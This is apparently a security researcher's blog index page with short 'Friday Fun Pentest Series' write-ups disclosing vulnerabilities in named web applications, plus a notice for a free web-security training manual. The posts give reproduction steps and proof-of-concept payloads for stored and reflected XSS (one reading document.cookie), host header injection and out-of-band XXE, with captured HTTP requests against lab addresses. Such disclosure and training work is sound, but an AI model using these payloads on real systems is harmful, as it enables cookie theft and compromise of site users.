- Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
- In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>
MSecure
Wednesday, 19 February 2025
Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2
Sunday, 16 February 2025
New Web Security Training Course !
Its been a while since I have released any papers related to web security. Without any further delay let me introduce you the "Web Security Training" training manual.
Introduction
Aimed at those that would like to learn more about web security and web app pentesting. The "course" is freely available, with taking the approach of "learn as you practice".
Each topic has a few bullet points describing what the vulnerability entails, then a screenshot and relevant payload, demonstrating the exploitation of the misconfiguration or the relevant issue.
Download Link
File is in PDF format. Requires the download of a VM (virtual machine) OWASP BWA. The course demonstrates OWASP Top 10 flaws and beyond. It is free of charge. Worth mentioning how good the "Mutillidae" web application is for training purposes.
https://drive[dot]google[dot]com/file/d/14FWeVKHz00hIrZH9x6Z4B5MHPH2K3cAu/view?usp=sharing
Saturday, 18 January 2025
Friday Fun Pentest Series - 18 - Host Header Injection - atutorv2.2.4
- Visit specific page of the application
- Intercept the HTTP GET/POST request
- Modify the Host header to a domain of attackers choice
- Forward the HTTP request
Friday Fun Pentest Series - 17 - Reflected XSS - atutorv2.2.4
Description
- It was found that the application was vulnerable to Reflected XSS.
Reflected XSS #1 - "theme_dir"
Steps to Reproduce:
- Login to the application with admin user
- Paste the following URL into the browser
Saturday, 14 December 2024
Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8
Description
Stored XSS Filter Bypass #1 - "Add Category"
Steps to Reproduce:
- Login as admin and go to "Content" > "Posts"
- On the right side of the page choose "Categories"
- In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>
// HTTP PUT request
PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]
[...]
// HTTP response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0
// HTTP GET request
GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]
// HTTP response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229
[...]
<span class="post-category"><a href="/blogengine/category/<b>12345<b><script>alert(1)<script><b>12345=<b>"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]
Thursday, 21 November 2024
Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1
Description
- The application is vulnerable to OOB XXE injection
XXE #1 - "show_operations.jsp"
Steps to Reproduce:
- Add Python3 server to serve malicious XXE payload
- Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp
- Enter the following URL as input
Wednesday, 20 November 2024
Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1
Description
- It was found that the application was vulnerable to Reflected XSS
Reflected XSS #1 - "show_operations.jsp"
Steps to Reproduce:
- Visit main page of the application.
- In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>
![]() |
Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2
Description - It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS. Se...

-
Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...
-
Description - It was found that the application suffers from Blind SQL injection Blind SQL Injection Steps to Reproduce: Login to applicat...
-
Description - It was found that the application is suffering from code injection vulnerability - The flaw allows the attacker to inject PHP ...